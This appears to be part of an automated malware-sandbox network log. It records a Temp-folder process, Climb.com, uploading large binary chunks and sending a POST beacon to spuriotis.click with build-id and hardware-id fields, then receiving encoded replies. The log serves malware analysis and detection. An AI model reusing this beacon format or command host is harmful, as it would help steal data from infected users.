2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 3d 99 15 9f 47 6a 2a 5e fe c3 62 72 f3 63 4f 57 4f ad fc 71 62 52 9b cf 09 75 8d fd dc fa 4d f5 35 76 b7 79 c5 b9 f6 69 7f 26 35 6f 2f 70 14 2e 02 98 5b a7 81 e3 85 1d 3c 3b 75 7a 65 0b 85 59 6e c3 12 ac d2 03 6d 1c 8e 3a 3e dc e6 eb fa a3 7b 11 56 13 72 93 05 d2 40 36 26 e4 96 d7 3c 44 b7 0b b5 37 f8 a0 8e 9f e9 7d 43 6e 33 79 1a 6e a1 05 1c 3e fe da 40 7c 84 29 f0 90 ff ff 8e 40 47 32 47 21 50 86 86 9a 0c c0 b5 b2 5c 44 64 49 44 6a 96 a2 c0 85 90 a7 da 7c 6b 74 71 55 ec ab 57 8a 43 5a 3f 00 61 0f d1 11 f3 0c 4b fc 32 e9 ea c1 0d 2c 7e 62 18 a5 82 02 89 1f 39 21 36 11 36 89 a1 86 4d 56 a5 41 b4 f1 d9 c6 05 57 03 d6 5d ba eb 8d 9b c6 bd 33 86 6b 7d c4 98 c8 c1 1c 01 fa 19 19 18 4d f0 39 eb c2 ad 51 a0 3a 9b 33 90 54 40 ab e8 76 d5 42 17 e5 1e fe 0c 88 cf Data Ascii: =Gj*^brcOWOqbRuM5vyi&5o/p.[<;uzeYnm:>{Vr@6&<D7}Cn3yn>@\|)@G2G!P\DdIDj\|ktqUWCZ?aK2,~b9!66MVAW]3k}M9Q:3T@vB
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: fc 1e 33 96 91 68 6a 4f fc 37 12 81 a6 86 8a ed 91 c6 ce a3 3c d1 e6 ed 28 73 27 8d 5f 97 f1 2f fd b6 de 83 e8 8e 73 01 ac 3e 04 89 65 04 30 7d d3 e9 36 6b 66 76 e7 c9 d5 13 9c 6b 06 78 fc 94 6e f0 57 c9 40 2c 0f 46 18 d3 ab 30 8e 66 44 15 75 1b cd c9 7e b0 66 34 19 63 c3 85 1a e5 ad dc 33 9d 92 46 47 c6 ef cc 0c 55 c4 6f be 14 a0 f0 73 ee 8c 06 63 eb 49 b5 d7 99 cc 88 bf 07 c9 75 12 91 c6 75 08 76 20 4c a2 1c 75 89 48 eb 43 33 e2 ca d5 d3 e1 7b 7c 4b 4f f9 54 24 93 2d ed 33 12 70 42 82 fb 19 25 7b 76 e9 70 49 df 65 4d 6f 3c 93 88 3c cc 67 52 f5 63 a5 49 eb e6 6a 66 eb 16 77 58 93 0e 46 08 bc 1e 50 1b cf 7a c3 05 fe 7c 1d 7b 12 59 63 a4 9b 95 c0 2b 04 6e 4f 40 8b e7 4c 33 13 44 63 9f 2f 9c 4b 60 ff f8 be 86 6b ca 5f 55 23 8b fd 39 ce 6d 72 70 fa cd 1c 4d Data Ascii: 3hjO7<(s'_/s>e0}6kfvkxnW@,F0fDu~f4c3FGUoscIuuv LuHC3{\|KOT$-3pB%{vpIeMo<<gRcIjfwXFPz\|{Yc+nO@L3Dc/K`k_U#9mrpM
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 53 3c e7 8a b0 f8 8f bf b9 1d ae d8 3b 70 90 3f 74 02 13 ea 8f fa b1 80 8b cd aa 33 a1 99 87 4d 84 48 70 e6 9f 04 56 7a b1 12 54 ae 8d 83 65 df f4 8a c2 ec dd 32 b0 21 06 7e c9 c5 ae 8f 12 1d 6c 7b 75 96 58 5d df 2d 61 7b e1 85 17 4f ff 77 98 e6 7a 06 f6 0e 97 b4 08 fd 15 62 27 aa ca 44 52 61 9b b1 5a 51 96 dd ba 5a ed 33 94 a1 ee 87 79 af 0f ee cf 3e 73 01 7d 73 8d 71 66 67 a6 c8 55 e8 26 55 5d 73 19 3d 8b 5e ce 99 b1 39 4a a6 b3 96 54 69 63 00 bc 45 33 e6 59 7d a4 34 11 40 d8 23 16 a5 c4 cd 6e d8 5e 1b fc 77 5d 72 a4 86 d9 39 f5 33 41 ee b8 33 bc 0f 34 a8 ec ec 77 98 6d 81 30 e0 90 14 43 be 01 a6 86 5d e2 02 0f c4 19 7a 88 b4 bb 7b 7d df fb ad d9 bb 4d 4c aa 10 7b e3 d7 56 25 2d cb 2f de 64 e9 89 2b bb 67 72 f0 6f cf c2 75 3c 60 51 95 03 4f 9d d9 07 a4 Data Ascii: S<;p?t3MHpVzTe2!~l{uX]-a{Owzb'DRaZQZ3y>s}sqfgU&U]s=^9JTicE3Y}4@#n^w]r93A34wm0C]z{}ML{V%-/d+grou<`QO
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 77 02 bf 1d 79 b4 b4 95 e9 65 bc 4f 64 c3 cb 51 40 a1 ba e7 a5 37 a6 68 f8 32 0e 8f f8 fe 3b 1d 3b 56 bc 60 4e e2 ff ba d9 8e a8 03 d2 4e 55 46 37 b3 cd 53 7d 9f 38 b8 f2 4f ea 8e 58 67 1e 44 91 20 4c 28 ed b1 47 8e cd d7 42 60 f6 59 28 44 94 cb 52 86 1c 85 7b 4f 72 b4 ce a5 71 ef f5 a0 63 fa f0 2e 17 89 81 bc f7 23 2d da 36 35 6b 45 b3 3c e4 4a d6 34 33 47 a8 53 34 dc 45 b2 38 a2 fa 08 b0 18 cd d4 40 7d c7 f6 fe a5 0d 57 34 5c c5 41 6a 0d d8 d8 ab 91 e5 90 b5 a3 bd 04 e0 a9 71 82 88 43 21 78 56 b1 73 76 96 c8 24 eb f0 e0 f7 2b 94 ca 5d b7 95 98 23 13 2c 4b b1 2c 6c d8 cf 5f ad fe bf 0b 7c 99 87 99 25 c5 c7 84 17 2e c7 64 ea 60 8c cf 93 7d 79 67 65 e2 0c c5 b1 1c 69 e8 f5 48 dc 6c 71 8c b8 ea 40 98 71 92 aa 27 07 d1 26 72 94 85 36 b5 a5 6e 8b 6e 9e 03 86 Data Ascii: wyeOdQ@7h2;;V`NNUF7S}8OXgD L(GB`Y(DR{Orqc.#-65kE<J43GS4E8@}W4\AjqC!xVsv$+]#,K,l_\|%.d`}ygeiHlq@q'&r6nn
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 4b c5 72 29 23 2e a7 36 a5 11 9e cb ce 99 c6 4d e8 53 88 d0 48 ac 17 52 9d ba 9a 9d ba eb 0d 06 b8 9c 5f 97 63 c5 3b e3 e5 83 bf fb c2 da f8 e2 a4 6f be 43 f9 d7 a6 32 58 7a 3b f6 b2 88 8c 26 74 93 ac 22 82 a9 d8 6b 90 b0 51 c5 21 dc cb 31 dd df 3f 12 45 51 18 bd b5 4a ae 3c ce d1 ab af e6 a6 fc 03 7a 14 21 0d a3 63 5a 2b d5 cb 1e d6 96 38 31 91 61 f5 29 21 9c db c7 9f 5c 60 55 3a 38 75 24 f7 48 68 f2 91 93 e7 ff 9d 36 63 91 d6 45 77 d8 11 25 df d8 62 db 66 e5 a2 56 7a 4e 43 19 d9 3e 89 3b 2f 2e 4d 1b 8e 7e b2 83 3e f3 3c 81 cf 62 c1 bc 70 5f fa 39 a0 b5 70 80 58 82 40 1c e5 dd 94 ed bf 92 36 80 05 e4 70 e8 1c 1f 28 b7 72 ff e5 ed 7e f2 09 e8 3c c2 89 b1 49 8b c8 3f 75 cb 83 e8 d4 e0 e8 97 55 81 9e 21 9c ca 57 9b e2 4c a0 5d 8e 35 2d 65 a7 fb f8 51 52 24 Data Ascii: Kr)#.6MSHR_c;oC2Xz;&t"kQ!1?EQJ<z!cZ+81a)!\`U:8u$Hh6cEw%bfVzNC>;/.M~><bp_9pX@6p(r~<I?uU!WL]5-eQR$
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: aa 7b 9e 1a 61 41 4f cf 08 7d f4 6e 83 fe d0 89 01 df f4 27 ad dd 9f 1f e6 9b 09 f2 6e cd db 7f 32 a2 fe ef 96 98 20 08 f1 59 5c 44 03 6d fc 15 1c 78 8b 2e 14 40 0d 93 c9 92 ff 04 a7 69 fb 24 6e 1e ab b1 34 e6 f7 d5 41 30 60 c0 09 72 8e 2c b5 17 45 0f 70 28 54 1a e6 4a 1e ee 97 1a 71 8d c7 8e a8 d2 05 30 da 2c cf 68 6a 30 c0 af 3f 66 8d ad 00 3e 15 f3 c1 e3 22 6f b6 e2 f6 4d 5b a1 79 ed 7c f8 cc 9c a9 9a 13 a7 36 9f 55 a4 1a f3 0a 8e 89 df 83 60 a3 6e fd f5 2b 0e 12 a8 eb 09 13 10 b8 41 c0 35 e0 ea 95 a3 42 76 53 f9 01 84 83 56 88 7b 43 77 72 ed 5a 73 66 c9 2e 36 a6 4e 23 d8 cb 96 78 0f cc 6b 74 12 21 e9 60 8d 31 3a 69 13 51 80 db 3e 9b 93 40 17 10 f8 35 65 53 68 63 6b 1b 98 b9 37 b6 fc 8b d7 96 32 b5 1e 41 b1 3e 99 e5 e3 a3 b8 04 95 da 89 65 d6 1d 3e 38 Data Ascii: {aAO}n'n2 Y\Dmx.@i$n4A0`r,Ep(TJq0,hj0?f>"oM[y\|6U`n+A5BvSV{CwrZsf.6N#xkt!`1:iQ>@5eShck72A>e>8
2024-12-28 08:34:09 UTC	15331	OUT	Data Raw: 14 74 9c d7 a7 09 7c b5 ff bf 97 de 58 c7 e9 9d cc 84 f8 98 c4 b2 9d 86 bc cc bb 6a 5e 82 88 37 66 d1 63 8d 89 80 61 77 14 e4 1f 9e 51 81 f2 7f 99 31 dd 1d 86 2f 5e fd 22 5a b9 f3 66 31 5b 03 01 91 5f 5c 53 4f 7b b3 ae e6 87 33 12 f2 97 6a 26 5c a6 e0 89 da 26 52 05 5a 5d c0 b2 75 47 e8 51 18 86 a9 41 31 6a 85 a6 38 6f f7 eb cb 45 2a 29 13 00 76 72 f4 8e f3 37 86 7c 67 07 7a 7a 48 1f 70 9d 3f 30 5a 13 de 73 5b c0 31 68 e1 d5 bc bd 0a b1 85 9e e5 31 58 29 37 58 72 d7 25 5f 6c 61 20 4c 2a d2 bb 59 b9 63 6c a9 58 9b 1e 45 ad 9b f5 c8 0b 41 b8 17 30 f6 e7 fa d8 2b c2 20 c4 7b 6e 56 1e 0e f3 83 5e 6b 26 4d 7c d8 93 02 8b 3a 7e a2 4a b2 66 fb 2a b8 ef 25 83 9c 76 93 6d 58 1e 23 d0 fa 73 4d 17 8a f7 a8 9a 8a 36 c8 08 98 3c f3 6c 79 74 e3 d8 77 54 bb 46 a1 bf d0 Data Ascii: t\|Xj^7fcawQ1/^"Zf1[_\SO{3j&\&RZ]uGQA1j8oE)vr7\|gzzHp?0Zs[1h1X)7Xr%_la LYclXEA0+ {nV^k&M\|:~Jf*%vmX#sM6<lytwTF
2024-12-28 08:34:12 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a5glupn4nmkh1gb607tqnnj25i; expires=Wed, 23 Apr 2025 02:20:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFkUOT5dd1IazSIJB8eF%2F%2Fc%2FQwVi36IQN3G79NBZpgDtqcJpsNNcW2HRyM%2Bch%2BG7VqdG2Tjo1Yd4kT16mo9KgbVVD49PqTBqIf27vfxMwh0Dg1ZKq69HR4Ds9eiKG3NEiLs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9035ad7a4943f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2365&min_rtt=2327&rtt_var=900&sent=346&recv=571&lost=0&retrans=0&sent_bytes=2832&recv_bytes=552705&delivery_rate=1254834&cwnd=217&unsent_bytes=0&cid=5574bd24a4da7d90&ts=2307&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:34:13 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: spuriotis.click
2024-12-28 08:34:13 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 38 44 32 43 44 30 32 34 44 39 32 36 30 39 38 44 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=8D2CD024D926098DD9AC212D15D33917
2024-12-28 08:34:14 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:34:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v53maoc1scpdg97gb8kevif7lj; expires=Wed, 23 Apr 2025 02:20:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZmzprjl6I7Q706VNiNzk4mx57Q90Y%2FfGtNmsocivuXRVkYxyKlR%2BvLQfsW%2BRutDtQ8bmYKD%2FupOx%2FCfm%2BD0jrjXdYPXYbBJk21HraSlTzh74TapmEGoUg%2F5N1dPMqDYHWI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9035c47ee041ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1856&rtt_var=699&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1562332&cwnd=192&unsent_bytes=0&cid=60767d7feaf88abb&ts=845&x=0"
2024-12-28 08:34:14 UTC	238	IN	Data Raw: 33 36 65 63 0d 0a 72 69 37 57 47 4f 38 4d 73 53 51 39 6a 49 41 4b 4b 47 6d 54 43 46 50 48 37 71 6e 72 71 71 76 36 65 4a 35 4c 6d 77 53 48 79 44 76 31 56 66 52 2b 6d 79 36 4c 46 52 47 75 35 53 67 53 57 4c 38 71 4e 2b 58 55 69 37 47 53 77 6f 6f 79 38 69 4c 31 64 4c 43 35 59 2f 64 57 6f 53 43 62 65 6f 4d 55 62 39 53 72 59 6d 45 62 79 6e 6b 59 6f 70 66 44 69 50 4c 6a 75 44 2f 36 66 63 70 58 74 71 4e 4b 78 56 71 54 64 62 68 74 31 45 70 49 2f 4d 35 67 59 43 33 71 4f 67 2f 6f 6a 50 75 74 7a 4a 32 2f 45 65 6f 69 39 48 53 77 67 33 62 57 54 62 56 64 74 54 2f 42 5a 6e 48 62 31 32 78 68 47 4d 42 53 43 72 66 59 7a 4e 33 47 6d 62 63 62 7a 67 66 35 50 66 4f 4e 62 66 49 42 75 55 75 6b 50 76 70 4e 55 2f 2f 76 4f 57 34 52 Data Ascii: 36ecri7WGO8MsSQ9jIAKKGmTCFPH7qnrqqv6eJ5LmwSHyDv1VfR+my6LFRGu5SgSWL8qN+XUi7GSwooy8iL1dLC5Y/dWoSCbeoMUb9SrYmEbynkYopfDiPLjuD/6fcpXtqNKxVqTdbht1EpI/M5gYC3qOg/ojPutzJ2/Eeoi9HSwg3bWTbVdtT/BZnHb12xhGMBSCrfYzN3Gmbcbzgf5PfONbfIBuUukPvpNU//vOW4R
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 35 46 6f 2b 71 6f 58 73 6e 2f 44 4b 6e 68 76 4b 41 4e 31 6a 30 37 70 56 79 78 7a 6b 59 4e 35 37 31 42 31 48 36 38 78 59 53 6a 72 53 65 77 6d 65 76 4d 61 64 2b 4f 36 34 41 76 59 75 36 56 69 6f 34 33 48 36 64 34 49 75 6f 6e 6a 31 51 58 50 55 30 7a 74 6b 43 74 68 72 4f 37 32 58 32 70 37 4f 78 37 38 4c 71 77 79 72 63 39 61 47 44 4f 56 6a 76 6c 61 69 53 65 74 50 54 63 72 51 58 58 34 6d 39 48 38 47 67 62 66 5a 33 63 2b 64 6c 6b 72 54 4b 4d 74 43 35 66 46 50 77 33 7a 6d 64 36 78 31 67 32 39 58 34 76 4e 6c 47 79 2b 6b 66 77 47 70 69 38 4b 75 33 76 47 67 51 66 63 37 30 57 6a 75 2b 30 75 5a 58 34 35 42 6c 33 75 4a 55 45 75 2b 73 46 78 77 51 75 74 42 49 5a 36 66 34 73 44 54 77 5a 35 4c 31 67 6e 63 59 4c 47 5a 61 4a 39 43 76 6d 47 6b 5a 39 78 7a 64 75 6e 75 66 31 67 Data Ascii: 5Fo+qoXsn/DKnhvKAN1j07pVyxzkYN571B1H68xYSjrSewmevMad+O64AvYu6Vio43H6d4Iuonj1QXPU0ztkCthrO72X2p7Ox78Lqwyrc9aGDOVjvlaiSetPTcrQXX4m9H8GgbfZ3c+dlkrTKMtC5fFPw3zmd6x1g29X4vNlGy+kfwGpi8Ku3vGgQfc70Wju+0uZX45Bl3uJUEu+sFxwQutBIZ6f4sDTwZ5L1gncYLGZaJ9CvmGkZ9xzdunuf1g
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 50 57 6c 77 49 58 5a 78 4d 6b 2b 35 6a 7a 4a 61 75 4b 6a 66 74 70 30 6a 43 43 47 66 50 74 49 56 4f 4c 77 50 56 6b 78 79 6e 41 6b 2f 35 72 66 32 5a 72 35 6f 6c 50 32 41 75 6c 64 39 6f 4e 65 31 30 53 31 51 4b 64 4f 39 6b 41 4c 33 64 4d 37 52 41 66 71 51 7a 69 71 75 65 4b 4f 78 4e 36 4b 48 50 51 44 33 33 32 31 6c 42 54 4d 66 4a 42 2b 32 55 6e 59 55 46 54 6a 38 44 31 6a 4a 2b 74 72 4d 49 4b 30 6d 70 76 6f 35 36 30 76 2b 41 4c 71 56 39 32 52 53 35 68 4c 34 48 54 64 51 64 4a 30 63 65 36 35 66 6d 30 2f 7a 79 63 38 6c 4b 57 62 6f 4d 50 46 69 52 65 74 44 65 4e 7a 31 61 5a 65 78 57 75 69 51 72 55 30 32 46 52 33 34 4f 6c 6b 57 46 37 69 55 41 71 2f 6d 5a 47 66 33 4a 6e 4b 4b 73 5a 67 38 30 33 31 6b 55 72 6c 53 36 39 79 6a 46 54 35 5a 6e 72 6f 74 6c 74 37 57 50 39 6d Data Ascii: PWlwIXZxMk+5jzJauKjftp0jCCGfPtIVOLwPVkxynAk/5rf2Zr5olP2Auld9oNe10S1QKdO9kAL3dM7RAfqQziqueKOxN6KHPQD3321lBTMfJB+2UnYUFTj8D1jJ+trMIK0mpvo560v+ALqV92RS5hL4HTdQdJ0ce65fm0/zyc8lKWboMPFiRetDeNz1aZexWuiQrU02FR34OlkWF7iUAq/mZGf3JnKKsZg8031kUrlS69yjFT5Znrotlt7WP9m
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 75 39 78 70 6d 33 47 39 4d 38 33 6c 4f 33 75 31 72 72 47 4a 55 6f 6c 6e 76 49 53 6b 37 6a 33 43 56 6a 4a 50 6c 6c 4a 4b 4f 70 38 4b 6a 64 35 62 34 63 79 58 6e 4d 56 4e 4f 76 44 4a 70 4e 6d 47 4b 49 50 4d 5a 71 63 72 75 34 59 47 34 50 34 56 52 38 6f 64 6a 47 72 35 4c 4d 6b 79 44 6f 42 50 59 76 36 37 35 50 35 55 79 6e 63 62 31 74 78 30 31 45 33 75 5a 6c 59 67 50 37 52 6a 43 4a 70 4f 69 42 7a 2b 37 4f 4f 2f 51 7a 31 57 44 4b 73 67 2f 58 61 4b 64 79 68 54 76 63 46 47 37 6f 77 6a 74 72 4d 4d 70 42 41 35 2b 4d 38 64 32 59 6d 72 77 76 38 43 48 73 4e 4f 75 2f 41 73 68 63 35 48 75 65 53 76 35 70 66 74 62 31 55 68 78 43 33 46 67 6a 71 49 6a 74 30 2b 48 67 7a 7a 7a 5a 4d 64 42 67 39 34 4a 73 2b 33 69 35 4b 71 42 41 39 58 64 73 78 64 77 6c 53 53 47 34 57 68 71 32 74 Data Ascii: u9xpm3G9M83lO3u1rrGJUolnvISk7j3CVjJPllJKOp8Kjd5b4cyXnMVNOvDJpNmGKIPMZqcru4YG4P4VR8odjGr5LMkyDoBPYv675P5Uyncb1tx01E3uZlYgP7RjCJpOiBz+7OO/Qz1WDKsg/XaKdyhTvcFG7owjtrMMpBA5+M8d2Ymrwv8CHsNOu/Ashc5HueSv5pftb1UhxC3FgjqIjt0+HgzzzZMdBg94Js+3i5KqBA9XdsxdwlSSG4Whq2t
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 79 6e 7a 33 45 4d 65 73 38 79 4b 4e 73 78 6e 4c 35 64 61 70 49 31 58 46 5a 78 63 4e 50 57 67 48 6a 58 68 4b 62 77 5a 36 48 37 2f 32 4d 41 4b 73 78 7a 6b 2f 32 67 30 7a 47 48 59 34 73 71 48 54 54 5a 67 7a 4a 39 46 42 4a 49 62 68 36 41 6f 6e 66 78 35 72 75 6e 71 6b 68 39 6a 79 6a 53 74 50 6a 43 64 64 73 74 58 32 65 50 2f 5a 55 43 50 2f 36 54 42 41 47 36 57 6f 56 74 39 2f 47 6b 75 44 44 6c 69 72 37 59 4d 45 30 30 59 46 51 79 68 6d 31 58 6f 45 30 34 6c 63 46 2b 75 56 34 62 7a 50 35 52 68 7a 31 68 64 76 66 67 63 71 4b 48 76 45 66 30 56 37 33 6b 6b 6e 35 64 72 42 51 32 45 4f 45 66 48 6a 47 34 6d 6c 74 47 63 56 34 4f 6f 4f 6a 78 4a 36 53 37 6f 67 4a 7a 51 43 70 64 4c 57 35 61 75 56 45 67 45 36 57 62 66 78 39 58 37 76 54 5a 78 73 66 31 48 67 5a 71 34 6e 77 73 35 Data Ascii: ynz3EMes8yKNsxnL5dapI1XFZxcNPWgHjXhKbwZ6H7/2MAKsxzk/2g0zGHY4sqHTTZgzJ9FBJIbh6Aonfx5runqkh9jyjStPjCddstX2eP/ZUCP/6TBAG6WoVt9/GkuDDlir7YME00YFQyhm1XoE04lcF+uV4bzP5Rhz1hdvfgcqKHvEf0V73kkn5drBQ2EOEfHjG4mltGcV4OoOjxJ6S7ogJzQCpdLW5auVEgE6Wbfx9X7vTZxsf1HgZq4nws5
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 30 58 6a 75 55 39 32 65 54 64 64 48 37 32 75 34 56 50 5a 33 44 50 7a 77 59 6d 51 49 33 32 59 42 6e 35 66 37 72 38 44 38 67 78 32 73 49 50 78 48 31 4a 51 55 78 32 79 4f 62 4e 35 47 33 6e 42 70 35 2b 73 35 62 67 48 6a 63 44 47 46 33 2b 79 66 38 4f 71 76 44 73 67 50 7a 58 58 70 67 30 2f 4c 65 4a 42 74 67 6c 43 65 64 77 76 69 77 57 68 74 58 50 74 61 48 59 57 6a 2f 64 2f 62 35 5a 77 56 71 77 33 63 59 4c 47 5a 61 4a 39 46 6c 45 76 57 57 64 5a 67 64 75 2f 78 49 56 67 38 78 44 34 78 67 4e 69 5a 77 50 76 34 74 68 50 7a 4a 4f 68 39 36 4c 68 5a 6e 45 72 76 55 71 56 47 34 57 70 61 70 2f 70 36 57 41 48 66 61 67 43 31 69 76 50 64 7a 65 61 58 53 50 73 6d 79 32 62 6c 38 55 2f 72 51 65 46 37 70 48 6e 59 59 46 54 74 38 46 31 30 52 76 70 43 47 49 44 57 7a 6f 6d 64 2f 35 73 Data Ascii: 0XjuU92eTddH72u4VPZ3DPzwYmQI32YBn5f7r8D8gx2sIPxH1JQUx2yObN5G3nBp5+s5bgHjcDGF3+yf8OqvDsgPzXXpg0/LeJBtglCedwviwWhtXPtaHYWj/d/b5ZwVqw3cYLGZaJ9FlEvWWdZgdu/xIVg8xD4xgNiZwPv4thPzJOh96LhZnErvUqVG4Wpap/p6WAHfagC1ivPdzeaXSPsmy2bl8U/rQeF7pHnYYFTt8F10RvpCGIDWzomd/5s
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 6b 44 2b 2b 6d 65 42 54 49 52 65 71 46 2f 39 66 52 61 39 74 46 34 63 45 63 4a 6d 4d 50 65 69 7a 39 6a 36 79 62 55 52 35 67 4c 32 54 63 69 4a 45 4e 6c 4e 6b 55 32 43 52 4d 68 39 62 63 44 69 4d 31 77 73 78 6c 49 61 73 35 76 76 73 38 44 37 6b 44 37 61 63 75 46 56 38 35 51 55 7a 52 65 6c 4c 72 35 4a 32 48 35 38 77 4f 78 6e 52 68 6d 71 63 51 71 68 70 4d 37 54 33 74 33 49 53 4d 77 74 31 33 4c 64 6f 6b 2b 65 5a 65 64 35 72 47 2f 70 62 48 2b 30 39 47 39 4f 50 39 56 6d 4f 49 54 59 33 5a 6a 6d 35 4d 67 58 32 69 72 68 63 65 53 55 46 50 35 2f 73 48 4f 44 51 66 56 78 46 76 71 79 55 48 34 35 38 54 6c 6d 74 61 2f 64 75 4d 76 69 6e 68 50 43 5a 50 35 68 31 76 73 4f 77 6d 47 53 54 4b 4d 37 30 6b 6c 31 39 64 6c 61 5a 41 75 71 66 42 61 66 31 76 47 41 6e 65 69 7a 47 66 45 35 Data Ascii: kD++meBTIReqF/9fRa9tF4cEcJmMPeiz9j6ybUR5gL2TciJENlNkU2CRMh9bcDiM1wsxlIas5vvs8D7kD7acuFV85QUzRelLr5J2H58wOxnRhmqcQqhpM7T3t3ISMwt13Ldok+eZed5rG/pbH+09G9OP9VmOITY3Zjm5MgX2irhceSUFP5/sHODQfVxFvqyUH458Tlmta/duMvinhPCZP5h1vsOwmGSTKM70kl19dlaZAuqfBaf1vGAneizGfE5
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 68 4f 32 47 4f 79 62 4b 64 44 2f 55 4a 2b 76 74 70 65 5a 79 4b 6e 58 58 69 74 31 38 36 47 79 38 61 73 41 50 30 6f 33 46 47 31 75 41 37 58 52 34 46 77 6f 45 6e 59 66 6d 54 38 2b 55 42 53 42 4e 78 74 42 35 65 4d 79 39 4c 6c 2f 4a 59 41 71 51 44 31 66 63 4f 69 62 63 5a 41 35 58 50 45 58 63 52 67 58 4f 4b 34 5a 78 6f 7a 71 32 45 6a 67 39 75 64 67 50 33 4b 69 79 47 71 4c 66 77 38 38 37 34 4a 36 45 43 67 59 4c 5a 42 77 6e 56 72 34 38 4e 54 57 52 7a 6c 51 54 72 78 75 4d 32 69 33 4f 4b 38 4c 39 38 6f 6f 6b 58 58 75 33 50 73 51 70 78 77 31 32 48 31 58 51 2f 51 72 32 68 36 4c 2f 42 45 46 61 71 62 6b 4a 6a 48 39 39 55 64 2b 6d 44 38 51 63 75 52 64 39 39 44 6b 6c 53 6d 5a 73 6c 42 56 4f 4c 6a 59 52 34 49 70 57 52 34 74 61 44 51 68 63 7a 54 6a 30 44 57 4a 50 52 58 7a Data Ascii: hO2GOybKdD/UJ+vtpeZyKnXXit186Gy8asAP0o3FG1uA7XR4FwoEnYfmT8+UBSBNxtB5eMy9Ll/JYAqQD1fcOibcZA5XPEXcRgXOK4Zxozq2Ejg9udgP3KiyGqLfw8874J6ECgYLZBwnVr48NTWRzlQTrxuM2i3OK8L98ookXXu3PsQpxw12H1XQ/Qr2h6L/BEFaqbkJjH99Ud+mD8QcuRd99DklSmZslBVOLjYR4IpWR4taDQhczTj0DWJPRXz
2024-12-28 08:34:14 UTC	1369	IN	Data Raw: 5a 72 31 4b 49 59 64 41 53 57 4e 33 31 66 47 49 44 78 57 49 70 6f 4c 4b 47 69 66 6a 74 74 30 37 59 44 75 39 71 38 4c 68 4e 6d 47 4f 44 65 37 56 46 36 31 51 49 7a 65 64 64 65 31 72 61 4f 43 71 64 69 64 6e 53 67 5a 32 56 4c 39 41 41 79 31 54 74 38 52 44 46 65 4a 68 33 75 46 2b 44 51 58 37 68 7a 32 56 52 41 65 74 6c 41 61 6d 44 77 71 6a 43 38 62 45 62 39 41 44 52 62 73 79 6d 56 5a 6c 63 35 30 48 65 61 34 6b 51 59 61 4f 7a 5a 6e 6f 38 6f 57 41 42 70 62 66 59 32 2b 61 5a 71 43 7a 76 45 76 39 49 78 6f 78 4f 39 46 53 55 55 49 64 6a 79 57 35 33 79 62 68 74 58 69 62 65 50 51 75 58 6e 4a 43 4f 33 39 47 73 47 39 30 61 33 6a 48 42 6b 41 33 64 48 62 52 79 73 79 50 68 48 55 37 76 7a 6e 74 2f 42 4d 56 38 43 72 2b 2f 30 4b 6a 41 36 6f 38 37 78 48 33 43 50 4f 4c 77 61 4d Data Ascii: Zr1KIYdASWN31fGIDxWIpoLKGifjtt07YDu9q8LhNmGODe7VF61QIzedde1raOCqdidnSgZ2VL9AAy1Tt8RDFeJh3uF+DQX7hz2VRAetlAamDwqjC8bEb9ADRbsymVZlc50Hea4kQYaOzZno8oWABpbfY2+aZqCzvEv9IxoxO9FSUUIdjyW53ybhtXibePQuXnJCO39GsG90a3jHBkA3dHbRysyPhHU7vznt/BMV8Cr+/0KjA6o87xH3CPOLwaM

Target ID:	0
Start time:	03:33:10
Start date:	28/12/2024
